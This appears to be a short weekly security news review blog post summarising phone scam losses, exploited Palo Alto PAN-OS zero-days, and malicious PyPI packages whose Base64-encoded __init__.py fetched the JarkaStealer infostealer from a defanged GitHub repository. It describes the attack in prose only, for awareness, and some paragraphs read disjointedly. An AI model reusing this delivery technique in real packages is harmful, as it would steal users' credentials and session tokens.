Introduction
Welcome, and I hope that you’re all doing well. This week’s review will be a short one because we have just 3 articles to cover. Why? They are the ones worthy of making it after careful consideration.
The articles are about scam and malware. Although we’re not immune from these two threats, education and awareness keep us one step ahead of threat actors (TAs).
Let’s begin.
If your mobile carrier labels a call as “Scam Likely”, it’s best to heed the warning and ignore the number. So many have lost money from picking up such calls and, to make it worse, they can record your voice to aid them in future phishing attempts.
Stay safe and read the excerpt below.
While 16% of global consumers reported losing money to phone scams in 2023, the figure is even higher in some countries like Germany (19%) and France (18%). It’s also costing victims in wasted time. Consumers claim they spend nine minutes per week – nearly eight hours each year, screening nuisance calls.
The numbers are worrying. Although, Palo Alto believes the actual number is less than 2000. Nonetheless, updates are available to patch the vulnerabilities, and if you’re affected, it’s best to update as soon as possible.
Here is an excerpt from the article:
Palo Alto Networks learned about a potential PAN-OS zero-day in early November and confirmed in-the-wild exploitation of a new vulnerability on November 15. On November 18, the security firm announced the release of patches for impacted firewalls and clarified that two vulnerabilities have been exploited in malicious attacks.
At the time of writing, the malicious packages have been removed from PyPI. While it was available for download, the download count was in the thousands. This proves once again, that malicious packages or applications can make their way into official sources.
The following is what happened when the packages were used:
Specifically, the “__init__.py” file in these packages contained Base64-encoded data that contained code to download a Java archive file (“JavaUpdater.jar”) from a GitHub repository (“github[.]com/imystorage/storage”). It also downloads the Java Runtime Environment (JRE) from a Dropbox URL if Java is not already installed on the host, before running the JAR file.
The JAR file is a Java-based information stealer called JarkaStealer that can steal a wide range of sensitive information, including web browser data, system data, screenshots, and session tokens from various applications like Telegram, Discord, and Steam.
Credits
Cover photo by Debby Hudson on Unsplash.
That’s it for this week, and I’ll see you next time.
Source link
lol
